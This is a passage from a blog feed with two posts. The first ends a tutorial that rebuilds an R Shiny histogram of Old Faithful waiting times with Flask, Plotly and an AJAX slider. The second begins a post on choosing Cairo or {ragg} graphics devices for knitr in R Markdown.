&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;faithful &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;./data/faithful.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/graph&amp;#39;&lt;/span&gt;, methods&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;&amp;#39;GET&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the bins&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; faithful[&lt;span style="color:#a5d6ff"&gt;&amp;#39;waiting&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; counts, bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(x, bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linspace(np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;min(x), np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;max(x), int(request&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;args[&lt;span style="color:#a5d6ff"&gt;&amp;#39;bins&amp;#39;&lt;/span&gt;])&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; (bins[:&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; bins[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;:])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; p &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;bar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;bins, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;counts,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;x&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;y&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; template&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;simple_white&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dumps(p, cls&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;PlotlyJSONEncoder)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;home&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; render_template(&lt;span style="color:#a5d6ff"&gt;&amp;#39;index.html&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;run()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running the server and viewing our work still won’t look very impressive, but we are almost there. At the end of our page we include a JavaScript file. Its job is to initialise our ion range slider and to send the chosen value from client to server to ask for the updated plot.&lt;/p&gt;
&lt;p&gt;We can use AJAX (Asynchronous JavaScript and XML) to send the data from the slider to our &lt;code&gt;/graph&lt;/code&gt; URL route and, on response, draw a new plotly plot into the div element with the &lt;code&gt;histogram&lt;/code&gt; id. We want this function to run when we first load the page and every time a user finishes moving the slider, which is what the &lt;code&gt;onStart&lt;/code&gt; and &lt;code&gt;onFinish&lt;/code&gt; callbacks do:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// hist.js
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; updatePlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; $.ajax({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;graph&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;GET&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; contentType&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;application/json;charset=UTF-8&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bins&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.from
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dataType&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;json&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; success&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(data){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plotly.newPlot(&lt;span style="color:#a5d6ff"&gt;&amp;#39;histogram&amp;#39;&lt;/span&gt;, data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(&lt;span style="color:#a5d6ff"&gt;&amp;#39;.js-range-slider&amp;#39;&lt;/span&gt;).ionRangeSlider({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;single&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;big&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; from&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onStart&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; updatePlot,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onFinish&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; updatePlot
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we are getting somewhere. Run your app and navigate to &lt;code&gt;localhost:5000&lt;/code&gt; to see the control and the output plot. Each time you release the slider, the plot will redraw.&lt;/p&gt;
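&lt;p&gt;To make the arithmetic inside &lt;code&gt;hist()&lt;/code&gt; concrete, here is a minimal sketch of the same bin calculation in plain Python, without NumPy. The helper name &lt;code&gt;bin_centres&lt;/code&gt; is hypothetical and not part of the app. It assumes the values are not all identical, and floating-point rounding at bin edges may differ slightly from &lt;code&gt;np.histogram&lt;/code&gt;.&lt;/p&gt;

```python
# Sketch of the bin arithmetic used in hist(), written without NumPy.
# bin_centres() is a hypothetical helper for illustration only.

def bin_centres(values, n_bins):
    """Return (centres, counts) for n_bins equal-width bins over values."""
    lo, hi = min(values), max(values)
    if hi == lo:
        raise ValueError("values must not all be identical")
    width = (hi - lo) / n_bins
    # n_bins + 1 equally spaced edges, like np.linspace(lo, hi, n_bins + 1)
    edges = [lo + i * width for i in range(n_bins + 1)]
    # Midpoint of each adjacent pair of edges, like 0.5 * (bins[:-1] + bins[1:])
    centres = [0.5 * (a + b) for a, b in zip(edges[:-1], edges[1:])]
    counts = [0] * n_bins
    for v in values:
        # The last bin includes its right-hand edge, as in np.histogram
        idx = min(int((v - lo) / width), n_bins - 1)
        counts[idx] += 1
    return centres, counts


centres, counts = bin_centres([1, 2, 3, 4], 2)
print(centres, counts)
```

&lt;p&gt;With the slider at 30, the route does roughly the equivalent of calling this helper on the &lt;code&gt;waiting&lt;/code&gt; column with &lt;code&gt;n_bins = 30&lt;/code&gt;, then passes the centres and counts to &lt;code&gt;px.bar&lt;/code&gt; as the x and y values.&lt;/p&gt;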
&lt;p&gt;To finish up we will add a little styling, just to get us closer to our target Shiny example. In our &lt;code&gt;app.css&lt;/code&gt; file under &lt;code&gt;static/css&lt;/code&gt; we add some styling around the input controls and make the title stand out a little more.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;title&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-size&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;rem&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;well&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background-color&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#f5f5f5&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;border&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;solid&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;#e3e3e3&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;border-radius&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Rerun our application with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python app.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And voilà, at &lt;code&gt;localhost:5000&lt;/code&gt; we have something that fairly closely matches our target. I really like Flask as a tool for creating web applications and APIs for data and models. The toolset explored here offers a lot of power and flexibility in what can be created.&lt;/p&gt;
&lt;p&gt;See the finished result at our &lt;a href="https://jr-demo.jmpr.io/hello-flask/" rel="external"&gt;Connect&lt;/a&gt; server.&lt;/p&gt;
&lt;p&gt;Watch this space for more Flask posts, where we will start to explore some more interesting applications.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-flask/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Setting the Graphics Device in a RMarkdown Document</title><link>https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/</link><pubDate>Wed, 15 Apr 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In our recent post about &lt;a href="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/" rel="external"&gt;saving R graphics&lt;/a&gt;, it became obvious that achieving consistent graphics across platforms or even saving the “correct” graph on a particular OS was challenging. Getting consistent fonts across platforms often failed, and for the default PNG device under Windows, anti-aliasing was also an issue. The conclusion of the post was to use&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt; for saving PDF graphics or&lt;/li&gt;
&lt;li&gt;&lt;code&gt;grDevices::png(..., type = &amp;quot;cairo-png&amp;quot;)&lt;/code&gt; for PNGs or alternatively&lt;/li&gt;
&lt;li&gt;the new {ragg} package.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In many workflows, function calls to graphic devices are not explicit. Instead, the call is made by another package, such as {knitr}.&lt;/p&gt;
&lt;p&gt;When knitting an R Markdown document, the default graphics device is &lt;code&gt;grDevices::pdf()&lt;/code&gt; for PDF documents and &lt;code&gt;grDevices::png()&lt;/code&gt; for HTML documents. As we &lt;a href="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/" rel="external"&gt;demonstrated&lt;/a&gt;, these are the worst possible choices!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-knitr-markdown-png-pdf-graphics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="pdfs-and-pngs"&gt;PDFs and PNGs&lt;/h2&gt;
&lt;p&gt;If you want to save your graphs as PDFs, then simply set&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo_pdf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;at the top of the Rmarkdown file. The PNG variant is slightly different, as we need to specify the device &lt;code&gt;dev&lt;/code&gt; and also pass the &lt;code&gt;type&lt;/code&gt; argument to the device&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;png&amp;#34;&lt;/span&gt;, dev.args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These options, i.e. &lt;code&gt;dev = &amp;quot;cairo_pdf&amp;quot;&lt;/code&gt;, can also be set at individual chunks.&lt;/p&gt;
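&lt;p&gt;As a minimal sketch, the two settings above could be combined in a single setup chunk so that the device follows the output format. This assumes a version of {knitr} that provides &lt;code&gt;is_latex_output()&lt;/code&gt;; it is one possible arrangement rather than a recommendation from the original tests.&lt;/p&gt;

```r
# Sketch: choose the graphics device from the output format.
# Assumes this runs in the setup chunk of an Rmarkdown document.
if (knitr::is_latex_output()) {
  # PDF (LaTeX) output: use the Cairo-based PDF device
  knitr::opts_chunk$set(dev = "cairo_pdf")
} else {
  # HTML and other output: PNG via the cairo-png type
  knitr::opts_chunk$set(dev = "png", dev.args = list(type = "cairo-png"))
}
```

&lt;p&gt;Outside of a knitting session &lt;code&gt;is_latex_output()&lt;/code&gt; returns &lt;code&gt;FALSE&lt;/code&gt;, so the PNG branch is used.&lt;/p&gt;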
&lt;h2 id="the-ragg-package"&gt;The {ragg} Package&lt;/h2&gt;
&lt;p&gt;Setting the &lt;code&gt;agg_png()&lt;/code&gt; function from the {ragg} package as the graphics device is somewhat more tricky as it doesn’t come pre-defined within {knitr}. The {knitr} &lt;a href="https://yihui.org/knitr/options/#plots" rel="external"&gt;docs&lt;/a&gt; state that&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;if none of the 20 built-in devices is appropriate, we can still provide yet another name as long as it is a legal function name which can record plots (it must be of the form function(filename, width, height))&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The arguments of &lt;code&gt;agg_png()&lt;/code&gt; are&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formals&lt;/span&gt;(ragg&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;agg_png)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $filename&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Rplot%03d.png&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $width&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 480&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $height&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 480&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This suggests we can simply set &lt;code&gt;ragg::agg_png()&lt;/code&gt; as the {knitr} &lt;code&gt;dev&lt;/code&gt;, as it’s of the correct form. However, careful reading of the knitr &lt;a href="https://github.com/yihui/knitr/blob/ffb9df6d76716cabe58f417c0173b36226005e31/R/plot.R#L115" rel="external"&gt;source code&lt;/a&gt; highlights that the &lt;code&gt;dpi&lt;/code&gt; argument isn’t passed to new devices and that the units should be inches. So after a “little” experimentation, we have&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ragg_png &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;, res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;192&lt;/span&gt;) {
